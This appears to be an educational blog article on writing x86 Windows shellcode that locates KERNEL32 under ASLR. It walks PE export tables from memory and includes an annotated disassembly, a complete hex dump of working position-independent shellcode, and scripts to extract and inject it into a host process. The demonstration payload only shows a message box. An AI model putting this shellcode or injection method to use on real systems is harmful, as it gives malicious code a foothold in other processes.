BYTE* / Shellcode Part 2: Locating KERNEL32 in ASLR memory

Date: Feb 14, 2018

Last-Modified: Sep 18, 2018

Download Source Code: findkernel_src.zip (21k)

NOTE: See the Limitations section from Part 1 for information about how this technique is impacted by SafeSEH

SUMMARY:
In Part 1 of this series (Swallowing Exceptions in Win32), I illustrated an efficient x86 shellcode implementation of KERNEL32's IsBadReadPtr() function to encapsulate Access Violation exceptions when checking arbitrary memory locations in the context of a user-mode process. In this article (Part 2), we'll build upon this functionality so that we may search memory to discover the locations for any API in the system, loading the dependent library modules as needed. This is especially useful in modern versions of Windows where the locations of system API functions are intentionally randomized in memory for security purposes.

This article also provides insight into how code can be constructed to gain access to system resources from a process no matter how its associated executable module was built, potentially reducing any process to a code-launching container. While obviously useful to malware, these techniques can prove useful for non-invasive patches to alter software where no source code is available.

MEMORY SEARCH: A UNIVERSAL METHOD OF API DISCOVERY:
Let's say we want shellcode to search memory so that we can discover where the MessageBoxA() function resides allowing us to pop up a message box. Countless examples always seem to target the MessageBox API because its one of the simplest methods to indicate a successful proof-of-concept; for that reason, I'm also going to use it.

We also want the method to be portable amongst any x86 (32 or 64-bit) versions of Windows as well as working under any process which may or may not already import functions from the desired library module. In our case the desired library is USER32.DLL as this is the executable module that contains MessageBoxA().

While the memory-search method is not the only solution to enable shellcode to reliably locate API functions from different versions of Windows, it has the highest educational value in my opinion because you get exposure the following important concepts: exception suppression, Windows memory layout, and parsing PE files; the only trade-off being code complexity. Luckily, the performance impact of locating the address of each desired function will be negligible and on par with (if not much less) than the initial delay when a process first starts: when the Windows loader parses and resolves the process' imports section.

THE KERNEL32.DLL GATEWAY:
Fortunately, we can do everything we need if we can just locate two KERNEL32.DLL functions: LoadLibrary() and GetProcAddress(). From there, we can exclusively rely on the operating system to efficiently load and locate the addresses of any other functions needed. And, because ALL processes always have KERNEL32.DLL loaded into their address space, it is always possible to access these two functions to bootstrap any number of APIs you want to access at runtime.

In summary, we are interested in KERNEL32.DLL because it is:

guaranteed to exist in all processes
contains LoadLibrary() and GetProcAddress() APIs which unlock access to all other API functions

At this point, you may have noticed there is a chicken-and-egg scenario: Since we don't yet know the location of the LoadLibrary() and GetProcAddress() functions, how do we get their addresses without first accessing LoadLibrary() and GetProcAddress()? We'll need to employ one of among a handful of known tricks to discover them.

ADDRESS SPACE LAYOUT RANDOMIZATION (ASLR)
Why can't addresses to API functions be hardcoded? Because system API addresses are no longer predictable on modern (post-XP) versions of Windows.

Prior to Microsoft's release of Vista, Windows loaded system DLLs at hardcoded addresses in all processes. Because each version of the operating system and service pack level happened to load KERNEL32.DLL at the same base address, shellcode could hardcode the addresses for the two "holy-grail" functions (LoadLibrary() and GetProcAddress()) for common versions of Windows and have easy access to the remainder of APIs on the machine. For example, Windows XP Service Pack 3 always loaded KERNEL32 at 0x7C800000, LoadLibrary() at 0x7C801D7B and GetProcAddress() at 0x7C80AE30 system-wide. Besides shellcode needing a table of different addresses per function per version of Windows, it was still pretty convenient to access the system once shellcode gained control.

With the public release of Windows Vista in January 2007, Microsoft stepped up their game with a security feature known as ASLR (Address Space Layout Randomization). ASLR randomizes the base load address for all system DLLs including KERNEL32.DLL each time the operating system boots. Additionally, 3rd-party modules can "opt-in" to the new security feature by specifying the IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE flag in the OptionalHeader's DllCharacteristics. This meant that the days of hardcoding addresses for system DLLs were over and malware must jump through a few more hoops to bypass ASLR.

In April 2007, Microsoft's Mark Russinovich said the following in the Technet article: Inside the Windows Vista Kernel

...
This hasn't posed a problem for malware on previous versions of Windows because for any given Windows release, system executable images and DLLs always load at the same location, allowing malware to assume that APIs reside at fixed addresses. The Windows Vista Address Space Load Randomization (ASLR) feature makes it impossible for malware to know where APIs are located by loading system DLLs and executables at a different location every time the system boots. Early in the boot process, the Memory Manager picks a random DLL image-load bias from one of 256 64KB-aligned addresses in the 16MB region at the top of the user-mode address space. As DLLs that have the new dynamic-relocation flag in their image header load into a process, the Memory Manager packs them into memory starting at the image-load bias address and working its way down. Executables that have the flag set get a similar treatment, loading at a random 64KB-aligned point within 16MB of the base load address stored in their image header. Further, if a given DLL or executable loads again after being unloaded by all the processes using it, the Memory Manager reselects a random location at which to load it. Figure 7 shows an example address-space layout for a 32-bit Windows Vista system, including the areas from which ASLR picks the image-load bias and executable load address.

Figure 7 - ASLR's effect on executable and DLL load addresses

Only images that have the dynamic-relocation flag, which includes all Windows Vista DLLs and executables, get relocated because moving legacy images could break internal assumptions that developers have made about where their images load. Visual Studio� 2005 SP1 adds support for setting the flag so that third-party developers can take full advantage of ASLR. Randomizing DLL load addresses to one of 256 locations doesn't make it impossible for malware to guess the correct location of an API, but it severely hampers the speed at which a network worm can propagate and it prevents malware that only gets one chance at infecting system from working reliably. In addition, ASLR's relocation strategy has the secondary benefit that address spaces are more tightly packed than on previous versions of Windows, creating larger regions of free memory for contiguous memory allocations, reducing the number of page tables the Memory Manager allocates to keep track of address-space layout, and minimizing Translation Lookaside Buffer (TLB) misses.

A security whitepaper from Symantec also reported additional details about the Windows Vista implementation of ASLR:

While loading an image that has elected to participate in ASLR, the system uses a random global image offset. This offset is selected once per reboot, although we've uncovered at least one other way to cause this offset to be reset without a reboot (see Appendix II). The image offset is selected from a range of 256 values and is 64 KB aligned. The offset and the other random parameters are generated pseudo-randomly. All images loaded together into a process - including the main executable and DLLs - are loaded one after another at this offset. Because image offsets are constant across all processes, a DLL that is shared between processes can be loaded at the same address in all processes for efficiency.

When executing a program whose image has been marked for ASLR, the memory layout of the process is further randomized by placing the thread stack and the process heaps randomly. The stack address is selected first. The stack region is selected from a range of 32 possible locations, each separated by 64 KB or 256 KB (depending on the STACK_SIZE setting).

Once the stack has been placed, the initial stack pointer is further randomized by a random decremental amount. The initial offset is selected to be up to half a page (2,048 bytes), but is limited to naturally aligned addresses (4-byte alignment on IA32 and 16-byte alignment on IA64). The choices result in an initial stack pointer chosen from one of 16,384 possible values on an IA32 system. Once the stack address has been selected, the process heaps are selected. Each heap is allocated from a range of 32 different locations, each separated by 64 KB. The location of the first heap must be chosen to avoid the previously placed stack, and each of the heaps following must be allocated to avoid those that come before.

The address of an operating system structure known as the Process Environment Block (PEB) is also selected randomly. The PEB randomization feature was introduced earlier in Windows XP SP2 and Windows 2003 SP1, and is also present in Windows Vista. Although implemented separately, it is also a form of address space randomization; but unlike the other ASLR features, PEB randomization occurs whether or not the executable being loaded elected to use the ASLR feature. An important result of the ASLR design in Windows Vista is that some address space layout parameters, such as PEB, stack, and heap locations, are selected once per program execution. Other parameters, such as the location of the program code, data segment, BSS segment, and libraries, change only between reboots.

In general, bypassing ASLR requires searching memory for KERNEL32.DLL or using hint(s) as to its current whereabouts.

A MEMORY SEARCH ALGORITHM:
The basic algorithm we'll be using is the same whether you want to search memory for EXEs or DLLs as both use the same format. First, pick a start address and test it to see if it accessible; in other words, that memory is mapped into the current process. If not, swallow the resulting Access Violation exception and loop back to the beginning to try the next memory location. Otherwise, see if that memory location begins with the 16-bit DOS-header signature "MZ" (little-endian value 0x5A4D). If this byte-sequence is found, we can proceed to ensure we have a valid PE image by locating the PE header. From here we can locate the export directory (if any) and walk its function tables to locate the desired function(s).

The only catch is that testing every user-mode memory location within the normal 2 GB range would take too long and a a noticeable delay isn't ideal. Luckily, the operating system imposes some restrictions on how executable modules are aligned in memory:

All executable modules are aligned on a 64 KB (65536 byte) boundary; i.e. a multiple of 0x10000
System modules, such as KERNEL32.DLL, are randomly offset within the upper 16 MB region of user-mode
System modules tend to be placed as high as possible in user-mode memory

Because executable modules are always 64 KB aligned, we can drastically reduce the number of memory locations to test. As a side note, the 64 KB alignment requirement actually applies to any executable module being loaded anywhere in memory on all versions of Windows (read about the 64K granularity design decision here). Additionally, Windows tends to choose high preferred-base addresses for system DLLs. The only thing ASLR does is to force DLLs downwards by a random offset up to a maximum of 16 MB. This translates to a worst-case of only 256 comparisons to find the DLL, however searching from the top -> backwards greatly improves the odds.

Now that we know we want to search backwards through memory in 64 KB decrements, at which address should we start? Since kernel-mode-only addressing begins at 0x80000000, you might guess we start our search at the first 64 KB boundary prior which is 0x7FFF000. This region of memory is known as the upper user-mode "off-limits" region so there is no point in testing it. Similar to the lower user-mode "off-limits" region between 0x00000000-0x0000FFFF, the purpose of these regions are to catch bad pointers. Therefore we start our search another 64 KB lower at 0x7FFE0000.

An annotated disassembly of the shellcode search function is illustrated below, with added spacing and indentation for clarity:

004010DE 55 PUSH EBP ;searchMemory() 004010DF 8BEC MOV EBP, ESP ;standard stack frame setup 004010E1 83C4 E8 ADD ESP, -18 004010E4 9C PUSHFD ;preserve previous processor state 004010E5 60 PUSHAD 004010E6 FC CLD ;ensure default direction is forward 004010E7 E8 00000000 CALL $+5 <004010EC> ;CALL-POP technique; get address of next instruction; inline data is then just an offset 004010EC 58 POP EAX ;eax = current EIP (as of the beginning of this POP instruction) 004010ED 83C0 06 ADD EAX, 6 ;adjust eax so it points past these instructions and to string data (below) 004010F0 EB 1C JMP SHORT searchCodeBegin <0040110E> ;jump past string data
004010F2 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 ASCII "LoadLibraryA",0 ; ASCII "LoadLibraryA" 004010FF 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 ASCII "GetProcAddress",0 ; ASCII "GetProcAddress
0040110E 8945 F8 MOV DWORD PTR SS:[EBP-8], EAX ;searchCodeBegin: init - store address to function strings 00401111 83C0 0D ADD EAX, 0D 00401114 8945 F4 MOV DWORD PTR SS:[EBP-0C], EAX 00401117 C745 FC 00000000 MOV DWORD PTR SS:[EBP-4], 0 0040111E BB 0000FE7F MOV EBX, 7FFE0000 ;ebx=mem_location, off-limits-start-region minus 64KB (0x7FFF0000-0x10000) 00401123 33C9 XOR ECX, ECX ;module-found count initialized to zero
00401125 60 PUSHAD ;loopMemTest: save the state of register variables prior to possible exceptions 00401126 53 PUSH EBX ;address we are testing 00401127 E8 82FFFFFF CALL isBadReadPtr <004010AE> 0040112C 8945 F0 MOV DWORD PTR SS:[EBP-10], EAX ;temporarily store result here (we don't need this variable at this point) 0040112F 61 POPAD ;restore our register variables 00401130 8B45 F0 MOV EAX, DWORD PTR SS:[EBP-10] 00401133 85C0 TEST EAX, EAX ;if memory not readable, try next memory location 00401135 0F85 C5000000 JNZ searchNextMemory <00401200> 0040113B 8B33 MOV ESI, DWORD PTR DS:[EBX] ;memory IS readible; see if module has an MZ signature 0040113D 66:81FE 4D5A CMP SI, 5A4D ;is it "MZ" ? 00401142 0F85 B8000000 JNE searchNextMemory <00401200> 00401148 8B73 3C MOV ESI, DWORD PTR DS:[EBX+3C] ;MZ sig FOUND - locate PE sig - esi = DOS header "e_lfanew" 0040114B 85F6 TEST ESI, ESI 0040114D 0F84 AD000000 JZ searchNextMemory <00401200> ;if (!e_lfanew) skip to next module 00401153 03F3 ADD ESI, EBX ;esi = PE header 00401155 8B06 MOV EAX, DWORD PTR DS:[ESI] 00401157 3D 50450000 CMP EAX, 4550 0040115C 0F85 9E000000 JNE searchNextMemory <00401200> ;if (pe_hdr != "PE",0,0) goto parsedone 00401162 66:8B46 18 MOV AX, WORD PTR DS:[ESI+18] ;check esi+18h for PE32 (i.e. 32-bit OptionalHeader magic / IMAGE_NT_OPTIONAL_HDR32_MAGIC) 00401166 66:3D 0B01 CMP AX, 10B ;IMAGE_NT_OPTIONAL_HDR32_MAGIC 0040116A 0F85 90000000 JNE searchNextMemory <00401200> ;unsupported OptionalHeader signature, skip this module 00401170 8B7E 78 MOV EDI, DWORD PTR DS:[ESI+78] ;edi = optHdr.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress 00401173 C745 E8 00000000 MOV DWORD PTR SS:[EBP-18], 0 ;init LoadLibrary and GetProcAddress address locations 0040117A C745 EC 00000000 MOV DWORD PTR SS:[EBP-14], 0 00401181 85FF TEST EDI, EDI ;locate exports table and functions/names array 00401183 74 7B JZ SHORT searchNextMemory <00401200> ;if (!optHdr.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress) goto next module 00401185 03FB ADD EDI, EBX ;add base to turn RVA into pointer 00401187 897D F0 MOV DWORD PTR SS:[EBP-10], EDI ;save off pointer to export table (pExportTable) 0040118A 8B4F 18 MOV ECX, DWORD PTR DS:[EDI+18] ;ecx = NumberOfNames; should always be >= NumberOfFunctions 0040118D 8B57 20 MOV EDX, DWORD PTR DS:[EDI+20] ; this is number of names left 00401190 03D3 ADD EDX, EBX ;edx = AddressOfNames array + base = pCurNameRVA
00401192 51 PUSH ECX ;parseModuleNextName: save NumberOfNamesLeft 00401193 8B32 MOV ESI, DWORD PTR DS:[EDX] ;esi = pCurNameRVA 00401195 83FE 00 CMP ESI, 0 00401198 74 4F JE SHORT parseModuleNextName_cleanup <004011E9> ;if (!*pCurNameRVA) goto cleanup 0040119A 03F3 ADD ESI, EBX ;esi = pszCurName = *pCurNameRVA + base 0040119C 837D E8 00 CMP DWORD PTR SS:[EBP-18], 0 ;if we already found LoadLibrary's address, 004011A0 75 11 JNE SHORT parseGpa <004011B3> ; skip to look for GetProcAddress instead 004011A2 B9 0D000000 MOV ECX, 0D ;look for LoadLibraryA export string; length of "LoadLibraryA" 004011A7 8B7D F8 MOV EDI, DWORD PTR SS:[EBP-8] 004011AA F3:A6 REPE CMPS BYTE PTR DS:[ESI], BYTE PTR ES:[EDI] 004011AC 75 05 JNE SHORT parseGpa <004011B3> ;not found, test function name for GPA 004011AE 8D75 E8 LEA ESI, [EBP-18] ;FOUND! translate name location to func address and store at [esi] 004011B1 EB 13 JMP SHORT foundFunction <004011C6> 004011B3 B9 0F000000 MOV ECX, 0F ;parseGpa: look for GetProcAddress export string; length of "GetProcAddress" 004011B8 8B7D F4 MOV EDI, DWORD PTR SS:[EBP-0C] 004011BB 8B32 MOV ESI, DWORD PTR DS:[EDX] ;esi = pointer to current function name 004011BD 03F3 ADD ESI, EBX 004011BF F3:A6 REPE CMPS BYTE PTR DS:[ESI], BYTE PTR ES:[EDI] 004011C1 75 26 JNE SHORT parseModuleNextName_cleanup <004011E9> ;not found, this function doesn't match either 004011C3 8D75 EC LEA ESI, [EBP-14] ;FOUND! translate name location to func address and store at [esi] 004011C6 52 PUSH EDX ;foundFunction: locate and store address of function: 004011C7 56 PUSH ESI ; *savedFunc = arFuncs[arOrdinals[curNamesIdx]] 004011C8 8B7D F0 MOV EDI, DWORD PTR SS:[EBP-10] ;edi = pExportTable 004011CB 8B77 1C MOV ESI, DWORD PTR DS:[EDI+1C] 004011CE 03F3 ADD ESI, EBX ;esi = pExportTable->AddressOfFunctions array + base 004011D0 8B57 24 MOV EDX, DWORD PTR DS:[EDI+24] 004011D3 03D3 ADD EDX, EBX ;edx = pExportTable->AddressOfNameOrdinals array + base 004011D5 8B4F 18 MOV ECX, DWORD PTR DS:[EDI+18] ;ecx = pExportTable->NumberOfNames 004011D8 2B4C24 08 SUB ECX, DWORD PTR SS:[ESP+8] ;ecx = NumberOfNames - NumberOfNameseLeft (saved ecx on stack) == base-0 curNamesIdx; a.k.a. hint 004011DC 0FB70C4A MOVZX ECX, WORD PTR DS:[ECX*2+EDX] ;ecx (curOrd) = arOrdinals[curNamesIdx] current ordinals array index pointer 004011E0 8B0C8E MOV ECX, DWORD PTR DS:[ECX*4+ESI] ;ecx = func_addr RVA = arFuncs[curOrd] 004011E3 03CB ADD ECX, EBX ;ecx = func_addr 004011E5 5E POP ESI 004011E6 890E MOV DWORD PTR DS:[ESI], ECX ;*savedFunc = func_addr 004011E8 5A POP EDX 004011E9 59 POP ECX ;parseModuleNextName_cleanup: ecx = functions left to test 004011EA 837D E8 00 CMP DWORD PTR SS:[EBP-18], 0 ;do we have addresses for both functions yet? 004011EE 74 08 JE SHORT findkernel.004011F8 004011F0 837D EC 00 CMP DWORD PTR SS:[EBP-14], 0 004011F4 74 02 JE SHORT findkernel.004011F8 004011F6 EB 17 JMP SHORT appDone <0040120F> ;pop ecx ;perform outer loop pops, and skip to function end 004011F8 83C2 04 ADD EDX, 4 ;edx = pCurNameRVA++ 004011FB 49 DEC ECX ;ecx = NumberOfNameseLeft 004011FC 85C9 TEST ECX, ECX ;do we have names left? 004011FE 75 92 JNZ SHORT parseModuleNextName <00401192> ;jump too far for LOOP instruction, so simulate LOOP with dec+test+jnz
00401200 85DB TEST EBX, EBX ;if somehow we just tested memory location 0, there is nothing more to test 00401202 74 0B JZ SHORT appDone <0040120F> 00401204 81EB 00000100 SUB EBX, 10000 ;try next lowest 4k memory page as WinNT always loads modules on a 4k boundary 0040120A E9 16FFFFFF JMP loopMemTest <00401125>
0040120F 61 POPAD ;cleanup - restore previous processor state 00401210 9D POPFD 00401211 8B45 EC MOV EAX, DWORD PTR SS:[EBP-14] ;return LoadLibrary and GetProcAddress addresses through registers 00401214 8B55 E8 MOV EDX, DWORD PTR SS:[EBP-18] 00401217 C9 LEAVE ;tear-down stack frame 00401218 C2 0400 RETN 4 ;cleanup one argument; this implementation passes stdout handle in DEBUG mode

SOURCE CODE SUMMARY:
The MASM source code can be downloaded at the link at the top of the article. This package comes with some batch scripts to build an EXE and manipulate the shellcode embedded within the EXE. The source code embeds ASCII Markers within the resulting executable so the shellcode can be extracted easily with tools. This allows the shellcode to be run as an EXE or as an injectable binary.

Once the EXE is built, you can use the shellcode scripts to extract and launch the shellcode, although you will need to download the bd and shelljmp tools separately as they are needed by these optional scripts. They may be placed in the same directory as the source or somewhere in your path. This allows you to launch the shellcode in an "unaware" generic host process to finalize this proof-of-concept code. With minor modifications, you can obviously use whatever shellcode extraction and hosting tools are in your toolbox although I'll illustrate using them as designed below.

To build the source, you'll need to edit the variables at the top of build.bat to point to the directory that contains your Visual C++ toolset. In other words, where your MASM (ML.EXE) and linker tools are located. You don't need Visual Studio installed, but you do need a version of those tools just mentioned along with any dependency DLLs - the exact files are documented in the build.bat file. With that said, the code has been tested and found to build without errors or warnings on the Visual C++ Toolsets 7.1 (2003) thru 10.0 (2010), but there is no reason it shouldn't work on the latest versions. Although there may be slight differences in the resulting EXE's due to differing linker versions, the shellcode produced by differing versions of MASM will be identical.

The source code contains the function isBadReadPtr() that we built in Part 1 of this series as well as the other boilerplate code to call the shellcode function from the EXE. To keep things simple, I put everything in a single source file with no includes necessary. Towards the top are the usual declarations and some debugging macros which can be enabled by setting the DEBUG variable to "1" in the contained build.bat. This will result in a DEBUG version of the EXE which outputs search progress to the console.

If you do utilize the DEBUG version of the EXE, note that this version is only designed to be run as an EXE from the console. Any shellcode extracted from the DEBUG version of the EXE won't run properly (i.e. it will crash) because various debugging strings reference the .data section and I didn't bother trying to build these strings into the shellcode, keeping it compact and simple for this article.

You'll notice the build script uses editbin.exe (also part of the Visual C++ toolset) as a post-link step to enable ASLR (/dynamicbase option) for the resulting binary, adding the 0x40 (IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) flag to the OptionalHeader.DllCharacteristics member of the PE header. This support requires versions of editbin from Visual C++ 8.0 (2005) SP1 or greater. I included it in the script so you could play with it (by commenting/uncommenting it out). Although this flag only randomizes the base load address for the EXE itself and doesn't affect the location of KERNEL32.DLL, it is present for completeness and reference.

Another side note to remember is that if a module doesn't contain a .reloc section, the operating system has no choice but to ignore the IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE flag as it can't load the module anywhere BUT its preferred load address. This is why modules that support ASLR must be linked with /FIXED:NO, the implied default for DLLs, but not EXEs. This forces the linker to generate a .reloc section.

USING THE SOURCE CODE:
Building and running the DEBUG version of the target using the build script is shown below:

The program locates the first executable module at the highest memory location that contains both LoadLibraryA() and GetProcAddress() exported functions (i.e. KERNEL32.DLL). Then a small bit of code uses the found function pointers to manually load USER32.DLL and subsequently launch MessageBoxA() resulting in the "ASLR defeated" message box.

You can see that running the program multiple times will produce the same addresses, but after a reboot, the addresses will all change. This is ASLR in action.

Using pelook (or Microsoft's Depends will also work) to examine the KERNEL32.DLL exports, we can see that the ordinal and hint numbers match the debug output shown above. This indicates we parsed the exports table properly:

loaded "c:\Windows\SysWOW64\kernel32.dll" / 1114112 (0x110000) bytes exports section: 1364 functions (KERNEL32.dll) / timestamp 11/30/2012 02:45:12am (0x50B81DB8) ORD HINT ENTRYPOINT F-OFFSET SECTION NAME ---- ---- ---------- -------- ------- ---- 0582 0580 7DD71222 00011222 .text GetProcAddress 0830 0829 7DD749BF 000149BF .text LoadLibraryA

For the sake of brevity, the output above had the other export lines removed. This was from the 32-bit version of KERNEL32.DLL from Windows 7 SP1 (64-Bit).

LAUNCHING THE SHELLCODE:
There is no question that the code works fine when run from its *nice and safe* EXE file. The real test is whether it will still work when separated from its EXE "shell" and injected into another process.

The first step is to extract the relevant code from the EXE between the markers explicitly placed there by the source code. Once the EXE is has been built (and for this article, it must be the default RELEASE build), run the shellcode_extract_from_exe script:

c:\tester\findkernel_src>shellcode_extract_from_exe.bat 505 bytes dumped to "shellcode.bin" Offset: 1058 (0x422) Dump Size: 505 (0x1F9) File Size: 3072 (0xC00)

The extracted shellcode.bin should be 505 bytes (md5=c33335237962a0266758405014d1578e), representing the completed proof-of-concept program. The corresponding binary dump is:

00000000 e8 00 00 00 00 58 83 c0 06 eb 42 55 53 45 52 33 .....X....BUSER3 00000010 32 00 4d 65 73 73 61 67 65 42 6f 78 41 00 41 53 2.MessageBoxA.AS 00000020 4c 52 20 64 65 66 65 61 74 65 64 00 4d 65 73 73 LR defeated.Mess 00000030 61 67 65 42 6f 78 41 20 64 79 6e 61 6d 69 63 61 ageBoxA dynamica 00000040 6c 6c 79 20 6c 6f 63 61 74 65 64 21 00 55 8b ec lly located!.U.. 00000050 50 ff 75 08 e8 63 00 00 00 50 52 8b 4d fc 51 ff P.u..c...PR.M.Q. 00000060 d2 50 8b 4d fc 83 c1 07 51 50 8b 45 f8 ff d0 50 .P.M....QP.E...P 00000070 6a 00 8b 4d fc 83 c1 13 51 83 c1 0e 51 6a 00 ff j..M....Q...Qj.. 00000080 d0 b8 2b 02 00 00 8b e5 5d c2 04 00 55 e8 00 00 ..+.....]...U... 00000090 00 00 58 83 c0 17 50 33 d2 64 ff 32 64 89 22 8b ..X...P3.d.2d.". 000000A0 44 24 10 8b 00 33 c0 eb 09 33 c0 64 8b 20 8b 24 D$...3...3.d. .$ 000000B0 24 40 33 d2 64 8f 02 5a 5d c2 04 00 55 8b ec 83 $@3.d..Z]...U... 000000C0 c4 e8 9c 60 fc e8 00 00 00 00 58 83 c0 06 eb 1c ...`......X..... 000000D0 4c 6f 61 64 4c 69 62 72 61 72 79 41 00 47 65 74 LoadLibraryA.Get 000000E0 50 72 6f 63 41 64 64 72 65 73 73 00 89 45 f8 83 ProcAddress..E.. 000000F0 c0 0d 89 45 f4 c7 45 fc 00 00 00 00 bb 00 00 fe ...E..E......... 00000100 7f 33 c9 60 53 e8 82 ff ff ff 89 45 f0 61 8b 45 .3.`S......E.a.E 00000110 f0 85 c0 0f 85 c5 00 00 00 8b 33 66 81 fe 4d 5a ..........3f..MZ 00000120 0f 85 b8 00 00 00 8b 73 3c 85 f6 0f 84 ad 00 00 .......s<....... 00000130 00 03 f3 8b 06 3d 50 45 00 00 0f 85 9e 00 00 00 .....=PE........ 00000140 66 8b 46 18 66 3d 0b 01 0f 85 90 00 00 00 8b 7e f.F.f=.........~ 00000150 78 c7 45 e8 00 00 00 00 c7 45 ec 00 00 00 00 85 x.E......E...... 00000160 ff 74 7b 03 fb 89 7d f0 8b 4f 18 8b 57 20 03 d3 .t{...}..O..W .. 00000170 51 8b 32 83 fe 00 74 4f 03 f3 83 7d e8 00 75 11 Q.2...tO...}..u. 00000180 b9 0d 00 00 00 8b 7d f8 f3 a6 75 05 8d 75 e8 eb ......}...u..u.. 00000190 13 b9 0f 00 00 00 8b 7d f4 8b 32 03 f3 f3 a6 75 .......}..2....u 000001A0 26 8d 75 ec 52 56 8b 7d f0 8b 77 1c 03 f3 8b 57 &.u.RV.}..w....W 000001B0 24 03 d3 8b 4f 18 2b 4c 24 08 0f b7 0c 4a 8b 0c $...O.+L$....J.. 000001C0 8e 03 cb 5e 89 0e 5a 59 83 7d e8 00 74 08 83 7d ...^..ZY.}..t..} 000001D0 ec 00 74 02 eb 17 83 c2 04 49 85 c9 75 92 85 db ..t......I..u... 000001E0 74 0b 81 eb 00 00 01 00 e9 16 ff ff ff 61 9d 8b t............a.. 000001F0 45 ec 8b 55 e8 c9 c2 04 00 E..U.....

An easy way to test the shellcode fragment in a host-process without writing a custom launcher is to use the shelljmp tool. Shelljmp maps a file into its process and "jumps" into it (start execution at the entrypoint). Since the shellcode was designed with its entry-point at the first byte, no offset needs to be specified. The shellcode can be launched with shellcode_run.bat:

Again, the message box appears (and blocks) just as it did when run solely from the EXE.

BENEFITS AND LIMITATIONS:
The algorithm depicted here is one of a few known methods to locate KERNEL32.DLL from shellcode. Unlike most methods, it is compatible with all versions of NT-based Windows (past and present), with or without ASLR. Its primary drawback is that it is incompatible with SafeSEH.

Other methods striking a balance between complexity and compatibility include:

Locating the top-most KERNEL32 exception handler from the FS:[0] chain
Walking the PEB's loaded module list
Walking the stack

The code presented here illustrates a "good-enough" solution and is intended for educational purposes only. It performs only minimal validation of the PE header to achieve its goals. Malformed headers could make it crash.

CONCLUSION:
While code can be easily extracted from a file, getting it to work regardless of where it might be loaded in memory can be tricky. Position independent code utilizes techniques that allow data and code to be packed within the same contiguous block. This shellcode block can only know about itself, at least initially, based on its own fixed offsets. Once it has discovered more from its surroundings can it do more "useful things" like dynamically load and call functions in separate libraries. Writing position independent code and making it robust enough to run anywhere on many operating system is truly an art form.

<END OF ARTICLE>

Questions or Comments?

Changelist for this document

    2018-09-18      * added links to top and within sentence in limitations regarding lack of SafeSEH compatibility
    2018-02-28      * added excerpt from Symantec's security whitepaper: An Analysis of Address Space Layout Randomization on Windows Vista™